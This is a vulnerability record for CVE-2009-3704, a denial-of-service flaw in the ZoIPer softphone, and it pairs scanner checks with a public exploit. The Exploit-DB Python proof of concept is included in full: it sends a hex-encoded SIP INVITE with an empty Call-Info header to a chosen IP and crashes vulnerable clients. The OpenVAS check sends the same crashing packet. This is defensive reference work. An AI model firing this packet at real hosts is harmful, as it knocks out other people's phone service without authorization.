ID CVE-2009-3704 Type cve Reporter cve@mitre.org Modified 2017-08-17T01:31:00
Description
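ZoIPer 2.22, and possibly other versions before 2.24 Library 5324, allows remote attackers to cause a denial of service (crash) via a SIP INVITE request with an empty Call-Info header. The records below give the fix as an upgrade to 2.24 or later (the OpenVAS entry also lists 2.13 for Linux). Of the two scanner checks included, the OpenVAS test is an active ACT_DENIAL check that sends such an INVITE and reports the host if SIP stops responding, so it can crash a vulnerable client; the Nessus plugin only compares the file version of zoiper.exe over SMB on Windows hosts.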
{"openvas": [{"lastseen": "2020-03-24T19:09:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3704"], "description": "This host is running ZoIPer and is prone to Denial of Service\n vulnerability.", "modified": "2020-03-20T00:00:00", "published": "2009-10-23T00:00:00", "id": "OPENVAS:1361412562310800963", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800963", "type": "openvas", "title": "ZoIPer Empty Call-Info Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ZoIPer Empty Call-Info Denial of Service Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800963\");\n script_version(\"2020-03-20T14:37:25+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-20 14:37:25 +0000 (Fri, 20 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-10-23 16:18:41 +0200 (Fri, 23 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2009-3704\");\n script_name(\"ZoIPer Empty Call-Info Denial of Service Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"sip_detection.nasl\");\n script_mandatory_keys(\"sip/banner/available\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37015\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/53792\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/0910-exploits/zoiper_dos.py.txt\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to cause the service to crash.\");\n\n script_tag(name:\"affected\", value:\"ZoIPer version prior to 2.24 (Windows) and 2.13 (Linux).\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error while handling specially crafted SIP INVITE\n messages which contain an empty Call-Info header.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ZoIPer version 2.24 (Windows) and 2.13 (Linux) or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running ZoIPer and is prone to Denial of 
Service\n vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"sip.inc\");\ninclude(\"misc_func.inc\");\n\ninfos = sip_get_port_proto( default_port:\"5060\", default_proto:\"udp\" );\nport = infos[\"port\"];\nproto = infos[\"proto\"];\n\nbanner = sip_get_banner( port:port, proto:proto );\nif( !banner || \"Zoiper\" >!< banner ) exit( 0 );\n\nif( ! sip_alive( port:port, proto:proto ) ) exit( 0 );\n\nvt_strings = get_vt_strings();\nfrom_default = vt_strings[\"default\"];\nfrom_lower = vt_strings[\"lowercase\"];\n\nreq = string(\n \"INVITE sip:\", from_lower, \"@\", get_host_name(), \" SIP/2.0\",\"\\r\\n\",\n \"Via: SIP/2.0/\", toupper( proto ), \" \", this_host(), \":\", port, \";branch=z9hG4bKJRnTggvMGl-6233\",\"\\r\\n\",\n \"Max-Forwards: 70\",\"\\r\\n\",\n \"From: \", from_default, \" <sip:\", from_lower, \"@\", this_host(),\">;tag=f7mXZqgqZy-6233\",\"\\r\\n\",\n \"To: \", from_default, \" <sip:\", from_lower, \"@\", get_host_name(), \":\", port, \">\",\"\\r\\n\",\n \"Call-ID: \", rand(),\"\\r\\n\",\n \"CSeq: 6233 INVITE\",\"\\r\\n\",\n \"Contact: \", from_default, \" <sip:\", from_lower, \"@\", get_host_name(),\">\",\"\\r\\n\",\n \"Content-Type: application/sdp\",\"\\r\\n\",\n \"Call-Info:\",\"\\r\\n\",\n \"Content-Length: 125\",\"\\r\\n\\r\\n\");\nsip_send_recv( port:port, data:req, proto:proto );\n\nif( ! sip_alive( port:port, proto:proto ) ) {\n security_message( port:port, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T11:40:53", "description": "ZoIPer Call-Info DoS. CVE-2009-3704. 
Dos exploits for multiple platform", "published": "2009-10-14T00:00:00", "type": "exploitdb", "title": "ZoIPer 2.22 - Call-Info Remote Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3704"], "modified": "2009-10-14T00:00:00", "id": "EDB-ID:9987", "href": "https://www.exploit-db.com/exploits/9987/", "sourceData": "#!/usr/bin/python\r\n\r\n# ZoIPer v2.22 Call-Info Remote Denial Of Service.\r\n# Remote Crash P.O.C.\r\n# Author: Tomer Bitton (Gr33n_G0bL1n)\r\n# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10\r\n#\r\n# Vendor Notified on: 21/09/2009\r\n# Vendor Fix: Fixed in version 2.24 Library 5324\r\n#\r\n# Bad Chars: \\x20 , \\x09\r\n\r\nimport sys\r\nimport socket\r\nimport os\r\n\r\n\r\ndef main(argc , argv):\r\n\r\n\tif len(sys.argv) != 2:\r\n\t\tos.system(\"cls\")\r\n\t\tsys.exit(\"Usage: \" + sys.argv[0] + \" <target_ip>\\n\")\r\n\t\r\n\ttarget_host = sys.argv[1]\r\n\ttarget_port = 5060\r\n\r\n\tevil_packet = \"\\x49\\x4e\\x56\\x49\\x54\\x45\\x20\\x73\\x69\\x70\\x3a\\x4e\\x65\\x6f\\x40\\x31\"+\\\r\n\t\t\t\t\t\"\\x30\\x2e\\x30\\x2e\\x30\\x2e\\x31\\x20\\x53\\x49\\x50\\x2f\\x32\\x2e\\x30\\x0d\"+\\\r\n\t\t\t\t\t\"\\x0a\\x56\\x69\\x61\\x3a\\x20\\x53\\x49\\x50\\x2f\\x32\\x2e\\x30\\x2f\\x55\\x44\"+\\\r\n\t\t\t\t\t\"\\x50\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x35\\x37\\x2e\\x31\\x33\\x31\"+\\\r\n\t\t\t\t\t\"\\x3a\\x31\\x32\\x39\\x38\\x3b\\x62\\x72\\x61\\x6e\\x63\\x68\\x3d\\x7a\\x39\\x68\"+\\\r\n\t\t\t\t\t\"\\x47\\x34\\x62\\x4b\\x4a\\x52\\x6e\\x54\\x67\\x67\\x76\\x4d\\x47\\x6c\\x2d\\x36\"+\\\r\n\t\t\t\t\t\"\\x32\\x33\\x33\\x0d\\x0a\\x4d\\x61\\x78\\x2d\\x46\\x6f\\x72\\x77\\x61\\x72\\x64\"+\\\r\n\t\t\t\t\t\"\\x73\\x3a\\x20\\x37\\x30\\x0d\\x0a\\x46\\x72\\x6f\\x6d\\x3a\\x20\\x4d\\x6f\\x72\"+\\\r\n\t\t\t\t\t\"\\x70\\x68\\x65\\x75\\x73\\x20\\x3c\\x73\\x69\\x70\\x3a\\x4d\\x6f\\x72\\x70\\x68\"+\\\r\n\t\t\t\t\t\"\\x65\\x75\\x73\\x40\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x35\\x37\\x2e\\x31\"+\\\r\n\t\t\t\t\t\"\\x33\\x31\\x3e\\x3b\\x74\\x61\\x67\\x3d\
\x66\\x37\\x6d\\x58\\x5a\\x71\\x67\\x71\"+\\\r\n\t\t\t\t\t\"\\x5a\\x79\\x2d\\x36\\x32\\x33\\x33\\x0d\\x0a\\x54\\x6f\\x3a\\x20\\x4e\\x65\\x6f\"+\\\r\n\t\t\t\t\t\"\\x20\\x3c\\x73\\x69\\x70\\x3a\\x4e\\x65\\x6f\\x40\\x31\\x30\\x2e\\x30\\x2e\\x30\"+\\\r\n\t\t\t\t\t\"\\x2e\\x31\\x3e\\x0d\\x0a\\x43\\x61\\x6c\\x6c\\x2d\\x49\\x44\\x3a\\x20\\x77\\x53\"+\\\r\n\t\t\t\t\t\"\\x48\\x68\\x48\\x6a\\x6e\\x67\\x39\\x39\\x2d\\x36\\x32\\x33\\x33\\x40\\x31\\x39\"+\\\r\n\t\t\t\t\t\"\\x32\\x2e\\x31\\x36\\x38\\x2e\\x35\\x37\\x2e\\x31\\x33\\x31\\x0d\\x0a\\x43\\x53\"+\\\r\n\t\t\t\t\t\"\\x65\\x71\\x3a\\x20\\x36\\x32\\x33\\x33\\x20\\x49\\x4e\\x56\\x49\\x54\\x45\\x0d\"+\\\r\n\t\t\t\t\t\"\\x0a\\x43\\x6f\\x6e\\x74\\x61\\x63\\x74\\x3a\\x20\\x3c\\x73\\x69\\x70\\x3a\\x4d\"+\\\r\n\t\t\t\t\t\"\\x6f\\x72\\x70\\x68\\x65\\x75\\x73\\x40\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\"+\\\r\n\t\t\t\t\t\"\\x35\\x37\\x2e\\x31\\x33\\x31\\x3e\\x0d\\x0a\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\"+\\\r\n\t\t\t\t\t\"\\x2d\\x54\\x79\\x70\\x65\\x3a\\x20\\x61\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\"+\\\r\n\t\t\t\t\t\"\\x6f\\x6e\\x2f\\x73\\x64\\x70\\x0d\\x0a\\x43\\x61\\x6c\\x6c\\x2d\\x49\\x6e\\x66\"+\\\r\n\t\t\t\t\t\"\\x6f\\x3a\\x20\\x20\\x0d\\x0a\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x2d\\x4c\"+\\\r\n\t\t\t\t\t\"\\x65\\x6e\\x67\\x74\\x68\\x3a\\x20\\x31\\x32\\x35\\x0d\\x0a\\x0d\\x0a\"\r\n\t\r\n\tos.system(\"cls\")\t\t\t\t\r\n\tprint \"[+] ZoIPer Call-Info Remote Denial Of Service\\r\\n\"\r\n\tprint \"[+] Exploited By Gr33n_G0bL1n\\r\\n\"\r\n\tprint \"[+] Connecting to %s on port %d\\r\\n\" % (target_host,target_port)\r\n\t\r\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\ttry:\r\n\t\ts.connect((target_host,target_port))\r\n\t\tprint \"[+] Trying To Send Evil Packet...\\r\\n\"\r\n\t\ts.sendall(evil_packet)\r\n\t\ts.close()\r\n\t\tprint \"[+] Done!\\r\\n\"\r\n\texcept:\r\n\t\tprint \"[x] Connection Error!\\r\\n\"\r\n\r\n\r\nif (__name__ == \"__main__\"):\r\n\tsys.exit(main(len(sys.argv), sys.argv))\r\n\t", "cvss": 
{"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9987/"}], "nessus": [{"lastseen": "2021-03-01T07:50:37", "description": "According to its version, the instance of Zoiper, a VoIP software\nphone application, installed on the remote host may crash if it\nreceives a specially crafted SIP packet.\n\nAn unauthenticated, remote attacker can leverage this issue to deny\nservice to legitimate users.", "edition": 24, "published": "2010-08-09T00:00:00", "title": "ZoIPer < 2.24 Crafted SIP INVITE Request Remote DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3704"], "modified": "2021-03-02T00:00:00", "cpe": [], "id": "ZOIPER_2_24.NASL", "href": "https://www.tenable.com/plugins/nessus/48273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(48273);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/08/07 16:46:51\");\n\n script_cve_id(\"CVE-2009-3704\");\n script_bugtraq_id(42214);\n script_xref(name:\"EDB-ID\", value:\"9987\");\n\n script_name(english:\"ZoIPer < 2.24 Crafted SIP INVITE Request Remote DoS\");\n script_summary(english:\"Checks file version of zoiper.exe\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains an application that is susceptible to\na denial of service attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Zoiper, a VoIP software\nphone application, installed on the remote host may crash if it\nreceives a specially crafted SIP packet.\n\nAn unauthenticated, remote attacker can leverage this issue to deny\nservice to legitimate users.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.24 or later as that reportedly addresses the\nissue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"audit.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(1, \"The registry wasn't enumerated.\");\n\n\n# Connect to the appropriate share.\nname = kb_smb_name();\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\n\nif(! 
smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\n\n# Connect to remote registry.\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n exit(1, \"Can't connect to IPC$ share.\");\n}\n\nhklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);\nif (isnull(hklm))\n{\n NetUseDel();\n exit(1, \"Can't connect to remote registry.\");\n}\n\n\n# Find where it's installed.\npath = NULL;\n\nkey = \"SOFTWARE\\Attractel\\Zoiper\";\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n value = RegQueryValue(handle:key_h, item:NULL);\n if (!isnull(value)) path = value[1];\n\n RegCloseKey(handle:key_h);\n}\nRegCloseKey(handle:hklm);\n\nif (isnull(path))\n{\n NetUseDel();\n exit(0, \"Zoiper is not installed.\");\n}\nNetUseDel(close:FALSE);\n\n\n# Check the version of the main exe.\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:path);\nexe = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\zoiper.exe\", string:path);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif (rc != 1)\n{\n NetUseDel();\n exit(1, \"Can't connect to \"+share+\" share.\");\n}\n\nfh = CreateFile(\n file : exe,\n desired_access : GENERIC_READ,\n file_attributes : FILE_ATTRIBUTE_NORMAL,\n share_mode : FILE_SHARE_READ,\n create_disposition : OPEN_EXISTING\n);\n\nver = NULL;\nif (!isnull(fh))\n{\n ver = GetFileVersion(handle:fh);\n CloseFile(handle:fh);\n}\nNetUseDel();\n\n\n# Check the version number.\nif (!isnull(ver))\n{\n version = ver[0] + '.' 
+ ver[2];\n fixed_version = '2.24';\n\n # nb: we're checking the file version, not the user-friendly version.\n if (ver_compare(ver:ver, fix:\"2.0.24.0\") == -1)\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n }\n exit(0, \"Zoiper version \"+version+\" is installed and hence not affected.\");\n}\nelse exit(1, \"Couldn't get file version of '\"+(share-'$')+\":\"+exe+\"'.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}